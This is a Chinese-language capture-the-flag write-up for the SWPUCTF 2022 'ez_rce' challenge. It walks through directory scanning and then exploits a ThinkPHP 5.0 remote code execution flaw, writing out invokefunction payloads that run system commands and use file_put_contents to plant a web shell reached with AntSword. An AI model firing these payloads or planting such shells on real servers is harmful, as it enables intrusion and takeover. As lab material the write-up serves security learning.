题解 :[SWPUCTF 2022 新生赛]ez_rce
打开这个题目 发现什么也没有
这个时候可以用dirsearch -u “网址” 来看一下该网址的文件和目录
发现robotx.txt文件 我们打开看一下
发现提示NSS/index.php/我们把NSS/index.php/这个路径输上去
发现弹出来Think.php 5.0 由此我们可以联想到Think.php 5.0 漏洞我们在网上找一下 https://img2020.cnblogs.com/blog/1863419/202112/1863419-20211224202858742-1691585409.png
该网址是这个漏洞的利用方式s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls /
bin boot dev etc flag home lib lib64 media mnt nss opt proc root run sbin srv sys tmp usr var var 好熟悉的界面 似曾相识啊
发现flag 我们把这个ls /换为cat /flag
发现啥也没有这个时候就感觉可能是套娃了 我选择构造文件来看看
payload :s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=eval.php&vars[1][]=我们打开中国蚁剑 路径为:
NSS/eval.php 密码为 cmd
发现连接成功
发现flag
这个题也太坑了 真的是套娃 真的flag在nss/ctf/flag/flag路径下
7.总结:
发现页面啥也没有时 可以用dirsearch工具进行 网站目录和文件的扫描 一般可疑文件:robots.txt index.php flag.php
如何出现flag但打开发现没有时 我们可以选择构造文件上传到该网站当前的目录下
最终找到真的flag